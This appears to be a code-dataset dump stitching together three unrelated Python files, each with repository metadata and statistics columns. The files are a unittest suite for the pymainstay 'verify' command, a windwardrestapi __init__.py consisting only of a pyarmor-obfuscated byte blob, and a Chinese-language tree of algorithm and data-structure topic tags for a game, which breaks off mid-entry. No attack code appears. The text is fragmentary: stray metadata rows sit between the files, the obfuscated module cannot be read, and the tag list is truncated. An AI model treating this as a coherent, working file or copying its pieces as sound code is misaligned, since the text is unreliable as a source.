"MIT"
] | null | null | null |
tests/test_verify.py
|
commerceblock/pymainstay
|
50987e147fd81c1e94b9dec08290cfb30076d3fd
|
[
"MIT"
] | 10
|
2019-11-16T17:46:36.000Z
|
2021-04-30T21:20:40.000Z
|
tests/test_verify.py
|
commerceblock/pymainstay
|
50987e147fd81c1e94b9dec08290cfb30076d3fd
|
[
"MIT"
] | null | null | null |
import sys
import json
import os
import random
import unittest
from io import StringIO
import mst.cmds as cm
import mst.args
class TestVerify(unittest.TestCase):
def test_validlist(self):
raw_args = []
raw_args.append('verify')
raw_args.append('-f')
raw_args.append('test_sequence_1.msp')
raw_args.append('-l')
raw_args.append('2ec91e4da17e991b2b11d4de76b43fe9a550ce2a59d8b2e0c9dbebc8f5aead5a,2e93d25081d0c14cfe0d556e0c5c0e4b6b109d50e61f0caa16da33b064c3ac87,50270593506e065e127e8abfa05205337163ebdeeb1ae45428af8b02cda761c9')
args = mst.args.parse_msc_args(raw_args)
out = cm.verify_command(args)
self.assertTrue(out)
def test_unorderedlist(self):
raw_args = []
raw_args.append('verify')
raw_args.append('-f')
raw_args.append('test_sequence_1.msp')
raw_args.append('-l')
raw_args.append('2e93d25081d0c14cfe0d556e0c5c0e4b6b109d50e61f0caa16da33b064c3ac87,2ec91e4da17e991b2b11d4de76b43fe9a550ce2a59d8b2e0c9dbebc8f5aead5a,50270593506e065e127e8abfa05205337163ebdeeb1ae45428af8b02cda761c9')
args = mst.args.parse_msc_args(raw_args)
out = cm.verify_command(args)
self.assertFalse(out)
def test_invalidlistproof(self):
raw_args = []
raw_args.append('verify')
raw_args.append('-f')
raw_args.append('test_sequence_2.msp')
raw_args.append('-l')
raw_args.append('2ec91e4da17e991b2b11d4de76b43fe9a550ce2a59d8b2e0c9dbebc8f5aead5a,2e93d25081d0c14cfe0d556e0c5c0e4b6b109d50e61f0caa16da33b064c3ac87,50270593506e065e127e8abfa05205337163ebdeeb1ae45428af8b02cda761c9')
args = mst.args.parse_msc_args(raw_args)
out = cm.verify_command(args)
self.assertFalse(out)
def test_validproof(self):
raw_args = []
raw_args.append('verify')
raw_args.append('-f')
raw_args.append('test_sequence_1.msp')
raw_args.append('-i')
raw_args.append('5222ffe08bfd4ca0db30d261b2d54d0b6e3faed5276be422e5e6ac32c450ccd7')
args = mst.args.parse_msc_args(raw_args)
out = cm.verify_command(args)
self.assertTrue(out)
def test_invalidproof(self):
raw_args = []
raw_args.append('verify')
raw_args.append('-f')
raw_args.append('test_sequence_3.msp')
args = mst.args.parse_msc_args(raw_args)
try:
out = cm.verify_command(args)
except:
out = False
self.assertFalse(out)
def test_docsequence(self):
cwd = os.getcwd()
raw_args = []
raw_args.append('verify')
raw_args.append('-f')
raw_args.append('test_sequence_1.msp')
raw_args.append('-d')
raw_args.append(cwd+'/files/')
args = mst.args.parse_msc_args(raw_args)
try:
out = cm.verify_command(args)
except:
out = False
self.assertTrue(out)
def test_docsequenceinvalid(self):
cwd = os.getcwd()
raw_args = []
raw_args.append('verify')
raw_args.append('-f')
raw_args.append('test_sequence_1.msp')
raw_args.append('-d')
raw_args.append(cwd+'/files2/')
args = mst.args.parse_msc_args(raw_args)
try:
out = cm.verify_command(args)
except:
out = False
self.assertFalse(out)
if __name__ == '__main__':
unittest.main()
| 29.084034
| 221
| 0.659058
| 364
| 3,461
| 6
| 0.162088
| 0.150641
| 0.196429
| 0.044872
| 0.782967
| 0.770604
| 0.770604
| 0.770604
| 0.770604
| 0.770604
| 0
| 0.142315
| 0.238659
| 3,461
| 119
| 222
| 29.084034
| 0.686528
| 0
| 0
| 0.722222
| 0
| 0
| 0.2513
| 0.186597
| 0
| 0
| 0
| 0
| 0.077778
| 1
| 0.077778
| false
| 0
| 0.088889
| 0
| 0.177778
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
102bab79a190e7f57be18c9d302cff1ab66c5c5e
| 1,019
|
py
|
Python
|
Python/windwardrestapi/Api/__init__.py
|
windward-studios/Windward-REST-version-2-Clients
|
8fd467e6f4ece6fcc435609ffb23448d07af3131
|
[
"MIT"
] | null | null | null |
Python/windwardrestapi/Api/__init__.py
|
windward-studios/Windward-REST-version-2-Clients
|
8fd467e6f4ece6fcc435609ffb23448d07af3131
|
[
"MIT"
] | 1
|
2020-10-12T20:32:05.000Z
|
2020-10-12T20:38:04.000Z
|
Python/windwardrestapi/Api/__init__.py
|
windward-studios/Windward-REST-version-2-Clients
|
8fd467e6f4ece6fcc435609ffb23448d07af3131
|
[
"MIT"
] | null | null | null |
__pyarmor__(__name__, __file__, b'\x50\x59\x41\x52\x4d\x4f\x52\x00\x00\x03\x08\x00\x55\x0d\x0d\x0a\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\xb5\x00\x00\x00\x00\x00\x00\x10\x2b\xae\x2a\x43\x7c\x38\x4a\x20\x1d\x05\x53\x57\x17\x4f\xd6\x67\x00\x00\x00\x00\x00\x00\x00\x00\x9c\x5e\x69\xd4\x40\x2e\x02\xc2\xcd\xac\x12\x8e\x22\x8b\xa4\xe3\x1b\x98\x6b\x58\xd1\x42\x09\x09\x1c\x52\x6c\x4d\x81\x4f\xaf\xe1\x51\x42\xbe\x57\xcf\x47\x8f\xb4\xd5\x80\x69\x3a\x85\x37\x36\xe2\x48\xce\xec\xce\xf5\x1d\x10\x1f\x39\x49\xb9\xaf\x5b\x75\xa3\x42\xbf\xe8\xde\xd5\x11\x93\x36\x89\x3b\xc8\x47\xb8\xa1\xe8\xb3\xfa\x31\xec\xa2\x31\x6d\xf7\x28\x28\xce\x0c\x36\x13\x3d\x88\xe7\x25\x7c\x10\x29\xbb\x5f\xf7\xe9\x07\xb1\xe1\xad\x3d\xe9\x69\x67\xfd\x91\x9a\x7b\xd5\xce\xae\xb4\x26\xe7\x12\x4a\x28\x20\xc0\x3e\xd5\x28\xce\x56\xaa\xbb\x2f\x90\x53\xfd\x6d\xbc\xcd\xc6\x12\xc6\xee\xaf\x9f\x8a\xc8\x23\x1e\x4d\xca\x33\x84\x27\x57\x8f\x53\x32\x93\xbe\x3b\x87\x91\x03\x28\xe3\xb2\xd3\x27\x1f\x5e\xc1\x06\xf9\x7b\xf4\x2e\x08\x76\x01', 2)
| 1,019
| 1,019
| 0.749755
| 250
| 1,019
| 3.008
| 0.596
| 0.183511
| 0.203457
| 0.191489
| 0.083777
| 0.083777
| 0.05984
| 0
| 0
| 0
| 0
| 0.332677
| 0.002944
| 1,019
| 1
| 1,019
| 1,019
| 0.40748
| 0
| 0
| 0
| 0
| 1
| 0.960784
| 0.960784
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
105ca16c1583c5d6493176808e02bb755de9ec63
| 47,327
|
py
|
Python
|
oiasg_base/__commons/_vars/knowledge.py
|
will7101/OIASG
|
44badff57689da99a2c9896d176b32e7b51d42b5
|
[
"BSD-3-Clause"
] | 1
|
2018-03-17T10:07:11.000Z
|
2018-03-17T10:07:11.000Z
|
oiasg_base/__commons/_vars/knowledge.py
|
will7101/OIASG
|
44badff57689da99a2c9896d176b32e7b51d42b5
|
[
"BSD-3-Clause"
] | 1
|
2018-03-17T11:35:54.000Z
|
2018-03-17T11:35:54.000Z
|
oiasg_base/__commons/_vars/knowledge.py
|
will7101/OIASG
|
44badff57689da99a2c9896d176b32e7b51d42b5
|
[
"BSD-3-Clause"
] | null | null | null |
tags.update({
0: {
'name': 'root',
'appearance': None,
'parent': None,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
1: {
'name': '算法',
'appearance': None,
'parent': 0,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
2: {
'name': '动态规划',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
3: {
'name': 'DAG 模型',
'appearance': None,
'parent': 2,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
4: {
'name': '背包 DP',
'appearance': None,
'parent': 3,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
5: {
'name': '数位 DP',
'appearance': None,
'parent': 3,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
6: {
'name': '插头 DP',
'appearance': None,
'parent': 3,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
7: {
'name': '子树 DP',
'appearance': None,
'parent': 3,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
8: {
'name': '区间 DP',
'appearance': None,
'parent': 3,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
9: {
'name': '决策优化',
'appearance': None,
'parent': 2,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
10: {
'name': '分步式转移',
'appearance': None,
'parent': 9,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
11: {
'name': '单调性分治',
'appearance': None,
'parent': 9,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
12: {
'name': '维护移动端点',
'appearance': None,
'parent': 11,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
13: {
'name': '斜率优化',
'appearance': None,
'parent': 11,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
14: {
'name': '四边形不等式',
'appearance': None,
'parent': 11,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
15: {
'name': '网络流',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
16: {
'name': '网络流线性规划',
'appearance': None,
'parent': 15,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
17: {
'name': '上下界网络流',
'appearance': None,
'parent': 16,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
18: {
'name': '最小割',
'appearance': None,
'parent': 16,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
19: {
'name': '费用流',
'appearance': None,
'parent': 16,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
20: {
'name': 'Edmond-Karp',
'appearance': None,
'parent': 15,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
21: {
'name': 'Capacity Scaling',
'appearance': None,
'parent': 20,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
22: {
'name': 'Dinic&SAP',
'appearance': None,
'parent': 20,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
23: {
'name': 'HLPP',
'appearance': None,
'parent': 20,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
24: {
'name': '差分约束',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
25: {
'name': '通用线性规划',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
26: {
'name': '单纯形算法',
'appearance': None,
'parent': 25,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
27: {
'name': '分数规划',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
28: {
'name': '贪心',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
29: {
'name': '分治',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
30: {
'name': '序列分治',
'appearance': None,
'parent': 29,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
31: {
'name': 'CDQ&整体二分&线段树分治',
'appearance': None,
'parent': 30,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
32: {
'name': '快速排序',
'appearance': None,
'parent': 30,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
33: {
'name': '快速选择',
'appearance': None,
'parent': 32,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
34: {
'name': 'Median of Medians',
'appearance': None,
'parent': 33,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
35: {
'name': '树分治',
'appearance': None,
'parent': 29,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
36: {
'name': '点/边分治',
'appearance': None,
'parent': 35,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
37: {
'name': '重链剖分',
'appearance': None,
'parent': 35,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
38: {
'name': '树上启发式合并',
'appearance': None,
'parent': 37,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
39: {
'name': '长链剖分',
'appearance': None,
'parent': 37,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
40: {
'name': '搜索',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
41: {
'name': 'DFS',
'appearance': None,
'parent': 40,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
42: {
'name': 'BFS',
'appearance': None,
'parent': 40,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
43: {
'name': '搜索优化与剪枝',
'appearance': None,
'parent': 40,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
44: {
'name': 'A*',
'appearance': None,
'parent': 43,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
45: {
'name': '迭代加深搜索',
'appearance': None,
'parent': 43,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
46: {
'name': '折半搜索',
'appearance': None,
'parent': 40,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
47: {
'name': '随机化及近似',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
48: {
'name': '爬山',
'appearance': None,
'parent': 47,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
49: {
'name': '模拟退火',
'appearance': None,
'parent': 47,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
50: {
'name': '遗传算法',
'appearance': None,
'parent': 47,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
51: {
'name': '机器学习基础',
'appearance': None,
'parent': 47,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
52: {
'name': '离线逆序',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
53: {
'name': '莫队算法',
'appearance': None,
'parent': 52,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
54: {
'name': '散列',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
55: {
'name': '数据结构',
'appearance': None,
'parent': 0,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
56: {
'name': '栈',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
57: {
'name': '队列',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
58: {
'name': '散列表',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
59: {
'name': '堆',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
60: {
'name': '二叉堆',
'appearance': None,
'parent': 59,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
61: {
'name': '可并堆',
'appearance': None,
'parent': 59,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
62: {
'name': '二叉查找树',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
63: {
'name': '堆树',
'appearance': None,
'parent': 62,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
64: {
'name': '伸展树',
'appearance': None,
'parent': 62,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
65: {
'name': '红黑树',
'appearance': None,
'parent': 62,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
66: {
'name': '替罪羊树',
'appearance': None,
'parent': 62,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
67: {
'name': '树状数组',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
68: {
'name': '线段树',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
69: {
'name': '划分树与归并树',
'appearance': None,
'parent': 68,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
70: {
'name': '并查集',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
71: {
'name': '带权并查集',
'appearance': None,
'parent': 70,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
72: {
'name': '路径压缩',
'appearance': None,
'parent': 70,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
73: {
'name': '按秩合并',
'appearance': None,
'parent': 70,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
74: {
'name': 'Sparse Table',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
75: {
'name': 'K维树',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
76: {
'name': '动态树',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
77: {
'name': '点/边分治树',
'appearance': None,
'parent': 76,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
78: {
'name': 'Link-Cut Tree',
'appearance': None,
'parent': 76,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
79: {
'name': '欧拉回路树',
'appearance': None,
'parent': 76,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
80: {
'name': 'AAA Tree&TopTree',
'appearance': None,
'parent': 76,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
81: {
'name': '动态图',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
82: {
'name': '图论',
'appearance': None,
'parent': 0,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
83: {
'name': '最小生成树',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
84: {
'name': 'Prim算法',
'appearance': None,
'parent': 83,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
85: {
'name': 'Kruskal算法',
'appearance': None,
'parent': 83,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
86: {
'name': 'Boruvka算法',
'appearance': None,
'parent': 85,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
87: {
'name': '最小树形图',
'appearance': None,
'parent': 83,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
88: {
'name': '朱-刘算法',
'appearance': None,
'parent': 87,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
89: {
'name': '斯坦纳树',
'appearance': None,
'parent': 83,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
90: {
'name': '最短路径',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
91: {
'name': 'dijkstra算法',
'appearance': None,
'parent': 90,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
92: {
'name': 'Bellman-Ford算法',
'appearance': None,
'parent': 90,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
93: {
'name': 'Johnson算法',
'appearance': None,
'parent': 92,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
94: {
'name': 'Floyd算法',
'appearance': None,
'parent': 90,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
95: {
'name': '欧拉路&哈密顿路',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
96: {
'name': '连通性',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
97: {
'name': '点/边双连通分量',
'appearance': None,
'parent': 96,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
98: {
'name': '强连通性',
'appearance': None,
'parent': 96,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
99: {
'name': '支配树',
'appearance': None,
'parent': 96,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
100: {
'name': '匹配、划分与覆盖',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
101: {
'name': 'KM算法',
'appearance': None,
'parent': 100,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
102: {
'name': '交错树',
'appearance': None,
'parent': 101,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
103: {
'name': '带花树算法',
'appearance': None,
'parent': 101,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
104: {
'name': 'Tutte矩阵与一般图匹配',
'appearance': None,
'parent': 101,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
105: {
'name': '覆盖集与独立集',
'appearance': None,
'parent': 100,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
106: {
'name': '稳定婚姻问题与GS算法',
'appearance': None,
'parent': 100,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
107: {
'name': 'Hall定理',
'appearance': None,
'parent': 100,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
108: {
'name': 'DAG路径覆盖',
'appearance': None,
'parent': 100,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
109: {
'name': 'Dilworth定理',
'appearance': None,
'parent': 100,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
110: {
'name': '2-SAT',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
111: {
'name': '虚树',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
112: {
'name': '仙人掌',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
113: {
'name': '圆方树',
'appearance': None,
'parent': 112,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
114: {
'name': '弦图与区间图',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
115: {
'name': '图的树分解',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
116: {
'name': '最小割',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
117: {
'name': '最小割树',
'appearance': None,
'parent': 116,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
118: {
'name': 'Stoer-Wagner算法',
